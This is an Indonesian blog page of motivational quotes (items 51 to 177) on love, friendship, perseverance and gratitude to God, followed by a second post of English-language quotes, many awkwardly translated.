      51. Berpisah selalu menitikkan air mata, kenangan indah ataupun buruk takkan terlupa dan kata tak pernah bisa gantikan rasa.
      52. Sahabat sejati lebih mudah ditemui ketika kamu mendapat masalah, daripada ketika mereka mendapat masalah.
      53. Jangan terlalu bahagia ketika seseorang nyatakan cinta, banyak orang yang mampu mengatakannya, namun sedikit yang sungguh dari hati.
      54. Jika seseorang tak berarti apa-apa bagimu, mereka tak akan bisa menyakitimu. Jika kamu merasa sakit, mereka punya arti bagimu.
      55. Hanya karena seseorang tersenyum, bukan berarti dia bahagia. Kadang seseorang tersenyum hanya tuk sembunyikan luka.
      56. Hidup ini singkat hanya tuk cemas apa yang orang lain pikirkan tentangmu. Jalani saja hidup yang kamu inginkan. Free Your Mind.
      57. Awali harimu dengan senyuman, seberat apapun masalah yang akan kamu hadapi, senyum membuatmu lebih percaya diri.
      58. Jangan biarkan dirimu dipenuhi kebencian, karena orang yang kamu benci tak peduli. Bahkan sebagian senang kamu membencinya.
      59. Jangan tangisi dia yang meninggalkanmu, meski ia sangat berarti. Kadang kamu harus kehilangan sesuatu agar yang lebih baik datang.
      60. "Cowok" tahu bagaimana mencuri hatimu & menghancurkannya. "Pria" tahu bagaimana menjaga hatimu & tidak pernah menghancurkannya.
      61. Maafkanlah kesalahan orang lain. Hidup terlalu singkat hanya untuk mendendam. Sabar, Maafkan, dan Lupakan.
      62. Lupakan mereka yang telah meninggalkanmu, tapi jangan pernah lupa untuk mengingat mereka yang menyayangimu, mereka sahabatmu.
      63. Jangan berhenti mengejar impianmu, meskipun itu sulit. Selama direncanakan dengan baik, percaya impianmu akan menjadi kenyataan.
      64. Ketika kamu merasa jatuh tanpa ada harapan, ketahuilah bahwa saat itu kamu sedang belajar tentang KEGIGIHAN dan KETABAHAN.
      65. Ketika mimpimu belum juga terwujud, jangan putus asa. Petik pelajaran dari setiap kegagalan, berusaha lebih keras, dan berdoa.
      66. Selalu jujur dengan diri sendiri akan membuat hidupmu jauh lebih baik karena itu membuatmu bebas dalam mengatakan segala sesuatu.
      67. Banyak cobaan hidup yang membuatmu meneteskan air mata, namun ada kalanya bukan karena sedih tapi karena pada akhirnya kamu bahagia.
      68. Kenangan tak akan bisa berubah, meski orang di dalamnya telah berubah. Tapi kamu harus melupakannya jika ingin terus melangkah.
      69. Rasa sakit itu kadang indah. Mereka mengajarkan kita bagaimana cara untuk bertahan.
      70. Selalu ada perbedaan dalam sebuah hubungan, yang kadang menyebabkan masalah, tetapi juga menguatkan.
      71. Seorang wanita yang cerdas tahu bagaimana cara mencintai. Namun wanita yang lebih cerdas tahu siapa yang pantas ia cintai.
      72. Jangan tangisi kesalahan terlalu lama. Setiap kesalahan mengajarkanmu tuk bisa lebih baik lagi. JANGAN MENYERAH.
      73. Ketika kamu tulus mencinta, tak peduli betapa kamu membenci apa yang telah dia lakukan, hatimu selalu memaafkan.
      74. Kebahagiaan hidupmu tidak didasarkan pada berapa banyak yang kamu miliki, tetapi berapa sedikit yang kamu butuhkan.
      75. Masalah akan membantumu memahami hidup ini lebih baik. Semua itu adalah proses pembelajaran tuk jadi pribadi yang BIJAKSANA.
      76. Suatu keberhasilan sangat tergantung pada prinsip hidup, motivasi dan seseorang yang menginspirasi.
      77. Terkadang air mata lebih berharga dari senyuman. Karena air mata menetes ketika hati tersentuh, sedang senyuman tak selalu dari hati.
      78. Hidup ini terlalu singkat tuk diisi dengan penyesalan. Sayangi mereka yg memperlakukanmu dengan baik dan maafkan mereka yg tidak.
      79. Apa yg terjadi saat ini adalah hasil keputusanmu di masa lalu. Buat keputusan yg baik hari ini tuk memiliki masa depan yg baik.
      80. Sahabat adalah mereka yg meminjamkan bahunya ketika kamu bersedih, dan ketika kamu pulih, dia menemanimu kembali menjalani hari.
      81. Jangan fokus pada apa yg sudah berakhir, tetapi fokus pada apa yang baru saja dimulai.
      82. Hidup ini kamu yang menjalani, kamu adalah penulis kisah hidupmu. Jangan biarkan orang lain yang menentukannya.
      83. Jangan iri atas keberhasilan orang lain, berbahagialah untuknya, berikan selamat! Percaya, suksesmu juga akan segera tiba.
      84. Tak perlu menghindar dari kesulitan, tetapi hadapi dengan hati lapang dan ikhlas, karena itu yang akan menjadikanmu kuat.
      85. Hanya karena seseorang selalu tersenyum, tak berarti hidupnya sempurna. Itu hanya berarti dia pribadi penuh harapan dan kekuatan.
      86. Jangan pernah lupa untuk bersyukur, baik itu atas anugerah maupun masalah. Ketahuilah bahwa Sang Kholiq yang memberikan semua itu.
      87. Kesalahan terbesar yang dapat kamu lakukan adalah ketika kamu menggantungkan hidup dan nasibmu pada orang lain.
      88. Ketika keberhasilanmu tertunda, jangan putus asa, segera bangkit dan katakan: "Aku bisa dan tak akan pernah menyerah".
      89. Bukanlah kesabaran jika masih ada batasnya, dan bukanlah keikhlasan jika masih merasa sakit hati.
      90. Jangan berusaha jadi orang lain. Kamu terlahir karena sebuah alasan. Maksimalkan diri tuk capai kebahagiaanmu sendiri.
      91. Apapun yang telah kalian dapatkan, syukuri dengan hati. Jangan pernah kalian kecewakan Sang Maha Pemberi.
      92. Meski jalan yang kamu hadapi sulit, itu bukanlah alasan untuk menyerah. Kemudahan akan selalu datang setelah kesulitan, percayalah.
      93. Jangan mengeluh atas apa yang kamu miliki. Apapun milikmu adalah anugerah Sang Pencipta. Berterima-kasihlah padaNya.
      94. Sesuatu yg sulit tuk mengatakan pada pikiranmu agar berhenti mencintai seseorang, ketika hatimu masih menginginkannya.
      95. Jika cinta ungkapkan saja. Mencintai dalam diam itu seperti telah membungkus sebuah kado tapi tak pernah memberikannya. ^_^
      96. Hidup seperti roller coaster, penuh tantangan. Beberapa orang takut, beberapa orang menikmatinya.
      97. Tak ada yg salah dalam memberi kesempatan kedua, tapi kadang kamu harus mendengarkan logika agar hatimu tak terluka.
      98. Hanya karena seseorang pergi darimu, tak berarti kamu harus merasa dirimu tiada arti. Kamu berharga, kamu harus tahu itu!
      99. Terkadang kamu harus menjauh dari seseorang, hanya tuk melihat siapa yg cukup peduli tuk mendekati dan membutuhkanmu.
      100. Dalam cinta, berhati-hatilah dalam membuka hatimu, karena hanya sedikit yang benar-benar peduli, sisanya hanya karena ingin tahu.
      101. Menyakitkan ketika kamu mendengar sesuatu yg membuatmu terluka, tapi yang harus kamu lakukan adalah pura-pura tak peduli.
      102. Jangan membenci mereka yang iri padamu. Hargailah karena mereka adalah orang-orang yg berpikir bahwa kamu lebih baik dari mereka.
      103. Jangan pernah takut mencoba. Kegagalan membuatmu kian dewasa. Kesalahan hanya membuatmu menjadi pribadi yg lebih baik!
      104. Beberapa hal yang tidak bisa dibeli dengan uang: Kesehatan, Kejujuran, Kedewasaan, & Keluarga.
      105. Ketika seorang wanita menceritakan masalahnya kepadamu, tak berarti dia mengeluh. Itu hanya berarti dia mempercayaimu.
      106. Dalam cinta, hanya karena seseorang telah melukai hatimu, tak berarti orang lain tak mampu menyembuhkannya.
      107. Ketika kamu merasa ujian dalam hidupmu begitu berat, bersyukurlah karena Sang Maha Agung melihatmu lebih kuat dari yang kamu pikirkan.
      108. Hanya karena ingin dicinta, tak berarti kamu harus berubah menjadi seseorang yang dia harapkan. Jangan kehilangan dirimu sendiri.
      109. Jika dia sungguh mencintaimu, tak ada yang mampu membuatnya pergi. Tapi jika dia tidak  sungguh mencintaimu, tak ada yang mampu membuatnya tetap tinggal.
      110. Semua orang pernah melakukan salah. Tetapi ketika kamu bertemu seseorang yangg tetap ingin bersamamu setelah tahu kesalahanmu, sayangi dia.
      111. Hidup terus berjalan entah sesuai harapanmu atau tidak, dan yang terpenting adalah, kamu harus selalu siap apapun itu.
      112. Kebahagiaan tak akan bermakna jika kamu tidak menyertakan orang disekitarmu yang sedang bersedih. Berbagilah dengan murah hati.
      113. Hidup adalah pilihan dan kamu adalah penentu pilihan itu. Bijak dalam memilih, pilihlah jalan yang memperkuat dirimu.
      114. Rintangan apapun yg menghadang, tetaplah bersabar dan ikhlas. Hadapi dengan penuh tanggung jawab, pertolongan-Nya pasti datang.
      115. Mulailah kebaikan dari diri sendiri. “Cintai diri sendiri, perbaiki diri sendiri, dan maafkan diri sendiri”.
      116. Selalu ada jalan keluar dari setiap masalah, selama kita berjuang dengan penuh keikhlasan.
      117. Dalam cinta, jangan pernah meninggalkan seseorang yang kamu cinta hanya untuk seseorang yang kamu PIKIR kamu suka.
      118. Hanya karena seseorang tak lagi ada dalam kehidupanmu, tak berarti kenangan bersamanya tak lagi ada dalam hatimu.
      119. Terkadang, kamu memilih tuk menolak cinta seseorang, bukan karena kamu tak ada rasa, tapi karena melindungi hatimu dari luka.
      120. Terkadang kamu harus menyerah, bukan karena berhenti mencinta, tapi karena terlalu berharap hanya membuat dirimu kian terluka.
      121. Dalam hidup, belajarlah tuk menghargai apa yang kamu miliki, sebelum waktu mengharuskanmu menghargai apa yang PERNAH kamu miliki.
      122. Jangan meremehkan mereka yang punya masa lalu yang buruk, terkadang merekalah yang mampu menciptakan masa depan yg terbaik.
      123. Wanita bisa menjadi sahabat terbaikmu, atau musuh terburukmu. Semua tergantung bagaimana kamu memperlakukan mereka.
      124. Jangan hiraukan mereka yg membencimu, karena sebenarnya mereka adalah orang yg diam-diam ingin menjadi sepertimu.
      125. Kadang kamu memilih tuk melepaskannya, bukan karena kamu tak pantas memilikinya, tapi karena kamu pantas yang lebih baik darinya.
      126. Berhenti habiskan waktumu melihat kembali apa yg telah hilang di masa lalu. Hidup ini berjalan ke depan bukan belakang. Move On!
      127. Hal menyakitkan ketika menyadari bahwa kamu tak berarti bagi seseorang adalah kamu mulai bertanya apakah ada yg peduli padamu.
      128. Sangat sulit tuk mempercayai seseorang, ketika setiap kali kamu percaya, dia akhirnya memberimu alasan tuk tak percaya siapapun.
      129. Jika seseorang ingin menjadi bagian dari hidupmu, dia akan berikan yang terbaik tuk berada di sana, tak peduli betapapun sulitnya.
      130. Seseorang yang benar-benar mencintaimu takkan berusaha membuatmu cemburu, karena ia menghargai kepercayaan, lebih dari kecemburuan.
      131. Tak ada yang sempurna, semua pernah melakukan salah. Tapi jangan pernah nyatakan cinta, jika memang kamu tak ada rasa.
      132. Dalam hidup, kamu harus melupakan apa yang telah pergi, hargai apa yg masih dimiliki, dan menanti apa yang akan menghampiri.
      133. Seberapa kuatnya dirimu, jangan pernah menanggung semuanya sendirian. Karena niscaya kau akan gagal.
      134. Di dalam cinta, keheningan lebih berarti daripada percakapan, sebab cinta awalnya bukan kata, melainkan rasa.
      135. Jangan pernah takut mencoba. Kegagalan tak datang karena kamu jatuh ke bawah, namun datang karena kamu tak bangkit berdiri.
      136. Terkadang, senyum tak hanya cara tuk sembunyikan luka, karena itu juga cara tuk bertahan pada bahagia yg tersisa.
      137. Orang yang paling tangguh adalah orang yang percaya kepada dirinya sendiri.
      138. Meski Allah SWT mengambil sesuatu yang baik dari hidupmu, bersyukurlah. Karena Allah SWT telah mempersiapkan yang lebih baik lagi untukmu.
      139. Selama kamu mencintai apa yang kamu kerjakan, kegagalan adalah sebuah motivasi untuk jadi lebih dewasa. Jangan menyerah!
      140. Jangan biarkan penyesalan terus membayangi harimu. Masa lalu telah berakhir, jalani hari ini untuk masa depan yang lebih baik.
      141. Terkadang kamu harus menyadari, ada beberapa orang yg tak bisa masuk ke kehidupanmu, tak peduli betapa kamu menginginkan mereka.
      142. Jangan pernah biarkan apa yang kamu INGINKAN, membuatmu lupa tentang apa yg telah kamu MILIKI.
      143. Terkadang bukan rasa sakit yang buatmu menderita, tapi pikiran negatif dirimu sendiri yang membuat segalanya terlihat buruk.
      144. Sahabat adalah mereka yang menggenggam tanganmu ketika kamu susah, tapi tahu kapan melepasmu untuk berjuang sendiri tuk belajar dewasa.
      145. Cinta monyet berkata: "Aku mencintaimu karena..." Cinta sejati berkata: "...karena aku mencintaimu."
      146. Masalah mudah diselesaikan jika kamu lebih memilih tuk saling berbicara, daripada berbicara tentang satu sama lain.
      147. Dalam cinta, kamu harus mencintai dirimu sebelum mencintai orang lain. Kamu harus peduli pada dirimu sebelum peduli pada orang lain.
      148. Dalam hidup, jika kamu tak bahagia dengan dirimu sendiri, kamu tak akan pernah bahagia dengan apa yang kamu miliki.
      149. Jangan pernah permainkan cinta. Jika tak ada cinta di hatimu, jangan pernah berikan seseorang harapan bahwa kamu mencintainya.
      150. Tak ada yang sempurna, begitu juga sahabat. Mereka pasti lakukan salah, tapi kamu selalu temukan sebuah alasan tuk maafkan mereka.
      151. Jangan pernah lari dari masalah, mereka akan selalu temukan dirimu. Hadapilah, mereka akan buatmu menjadi pribadi yg lebih kuat.
      152. Kadang kamu bersedih tuk seseorang yg tak peduli padamu, hingga membuat dia yang peduli padamu bersedih.
      153. Jika kamu hanya bisa bahagia ketika semua masalahmu selesai, mungkin kamu tak akan pernah bahagia.
      154. "Cantik" bukan berarti baik. "Kaya" bukan berarti bahagia. Karena kecantikan & kekayaan bukan jaminan "kesempurnaan".
      155. Satu-satunya doa dalam hidup kita yang akan membuat kita selalu merasa cukup dalam segala hal adalah: "Alhamdulillah".
      156. Ketika kamu merasa hatimu sangat terluka, ketahuilah bahwa saat itu kau tengah belajar tentang MEMAAFKAN.
      157. Cinta seorang ibu adalah penyemangat yg memungkinkan seseorang tuk melakukan hal yang menakjubkan.
      158. Seseorang tidak akan bisa membuatmu terluka, kecuali dia adalah seorang yang berharga bagimu.
      159. Allah SWT memberimu hidup agar kamu dapat menikmati segala hal, namun juga memberi cobaan agar kamu selalu ingat pada-Nya. Bersyukurlah.
      160. Yang terpenting bukanlah di mana kamu sekarang, tapi ke mana kamu akan pergi dari tempatmu sekarang.
      161. Kamu tak akan temukan hal yang baik dalam diri seseorang, jika kamu terus bandingkannya dengan seseorang yg menurutmu lebih baik.
      162. Beberapa orang mungkin tidak tinggal dalam hidup kita seperti yang kita inginkan. Tapi yang lebih baik akan datang sesuai yang Allah rencanakan.
      163. Berhenti berusaha menjadi seperti orang lain, karena itu hanya membuatmu tak menghargai dirimu sendiri. Love yourself!
      164. Ketika seseorang yang sangat kamu percaya mendustaimu, ketahuilah bahwa kamu tengah belajar tuk lebih percaya pada dirimu sendiri.
      165. Berhenti berusaha menjadi seseorang yang diinginkan oleh semua orang, jadilah seseorang yg dibutuhkan oleh semua orang.
      166. Ketika kenyataan tidak sesuai dengan harapan, berpikirlah, cari dan temukan penyebabnya, dan jangan pernah berhenti berharap.
      167. Dia yang tulus mencintaimu akan berjuang untuk tetap bersamamu apapun yang terjadi.
      168. Kebohongan tidak akan menyakitimu, kecuali jika itu diucapkan oleh seseorang yang paling kau percayai.
      169. Kebahagiaan tak datang dari mendapatkan sesuatu yang tak pernah kamu miliki, namun dari menghargai sesuatu yang telah kamu miliki.
      170. Salah satu hal paling bahagia di dunia ini adalah melihat ibumu tersenyum, dan lebih bahagia lagi ketika tahu kamulah alasannya.
      171. Jangan memohon pada Allah tuk meringankan cobaan yg ada, berdoalah pada Allah tuk memberikanmu kekuatan tuk dapat melaluinya.
      172. Dalam hidup, kamu mungkin mencintai orang yang salah, terluka karenanya. Tapi karena kesalahan itu, kamu pasti temukan seseorang yang tepat.
      173. Salah satu hal tersulit dalam hidup adalah berusaha berhenti mencintai seseorang, hanya karena dia telah berhenti mencintaimu.
      174. Lelaki bisa merasa jenuh dengan suatu hubungan yg berlangsung lama jika hanya dilalui dengan rutinitas yang sama.
      175. Lelaki akan sulit meminta maaf jika ia tak benar-benar merasa salah. Tapi, ia mudah meminta maaf pada wanita yang ia cinta.
      176. Hal yang baik bertemu teman baru, namun tak berarti yang lama dilupakan. Karena teman lama yang selalu ada saat kamu membutuhkan.
      177. Kamu tak akan dapatkan apa yang kamu inginkan jika kamu terlalu sibuk mengeluh apa yang telah kamu miliki, tak cukup untukmu.


      Semoga kata-kata mutiara kehidupan remaja diatas dapat bermanfaat khususnya bagi kaum remaja.

      Related Posts:

      Kata-Kata Mutiara dalam Bahasa Inggris


      Pada update-an kali ini saya akan mencoba menyajikan yang tak kalah bagusnya yaitu Kata-Kata Mutiara Dalam Bahasa Inggris. Simak saja langsung di bawah ini :


      Love is beauty, but not every beauty have love

      Politeness Is the oil which reduces the friction against each other.(Demokritus)

      Did not know it was love!

      Whatever you do, make sure your intentions for the good. Because whatever is done by good intentions, who will produce good results.
      .
      No matter what problems you face today, while you still can dream, do not forget to pray prayers tonight. All night ..

      Do not judge someone just from what he did, because you also have to know the reason why he is doing.

      Sometimes, God give thee of heavy trials, because HE believes in your ability than you believe in yourself.

      Someone who does not deserve you would never say: "You deserve a better person than me."

      Forget him who has given so many wonderful memories is not easy thing, but if it's best, then let it go!

      In love, no need to find someone perfect, but someone who loves what they are, who make you feel perfect.

      Something that is difficult when you have to smile, just because you do not want to explain to others why you are sad.

      We can not make other people grow up, because being an adult is a choice, not coercion.

      You do not have to be PERFECT to have a HAPPY life.

      Just because you have not found someone who treats you well, does not mean you have shared with someone who does.

      The easiest way to find yourself happy is doing what for you laugh and bring you with him who are happy for you.

      He who can make you feel better is he who is the reason why you're sad.

      Success comes to those who would still try though never do wrong. Those who never give up, because the spirit is still there.

      You do not encounter problems need to be as pretty as the other org, Because there were plenty of beautiful people out there, but there is only one you

      Sad when you meet someone who you believe true love, but you must let him go because he could not be owned.

      Physically, there's always someone who is more beautiful than you. That's why a good attitude & personality is always far more important

      In love, find one who loves what they are, not he who you have proved you were worthy of a loved one.

      Sometimes, instead of losing who hurt you, but the fact that he did not do anything to defend yourselves.

      Bad things always happen in this life, you will be hurt, but behind it all there will be happily awaiting reply.

      Easy to care for someone tuk, tuk but make him care about you? HARD! so, do not ever lose someone who cares about you.

      Sometimes, not about him that you miss, but the feeling of who you have when you're with him.

      Sometimes, no matter how many times you convince yourself that you're better off without him, he still had some of your heart.

      Complicate something that you love when he was hurt, but even more difficult when you have to try to hide it.

      In fact Men must respect women for who he is, rather than on his physical appearance.

      In fact Men should be able to make a girl smile when she was sad.

      Sometimes you choose to not easily fall in love, because you are tired of giving everything and end up not having anything.

      If you genuinely love someone, listen to your heart, not the people around you. This is your life!

      Never sacrifice who you are just because someone does not like who you are.

      You do not know what you had until she was gone, though sometimes you know what you have, tp never thought he would go.

      Those who are rich are not those who can afford to buy everything, but those who have something that could not buy anything.

      If you feel always wrong, do not give up. But go back and check what you've done, because surely there are way wrong.

      Do not be proud of what you have. Proud of how you get what you got.

      Do whatever you like. Because you will not feel compelled even if you fail you will not feel disappointed.

      Routines are sometimes boring. But if it's for good, do not you leave, but do it with great pleasure.



      Semoga artikel Kata-Kata Mutiara dalam Bahasa Inggris diatas bermanfaat. Kalau yang suka tolong di like dan di share yah, terimakasih.

      Related Posts: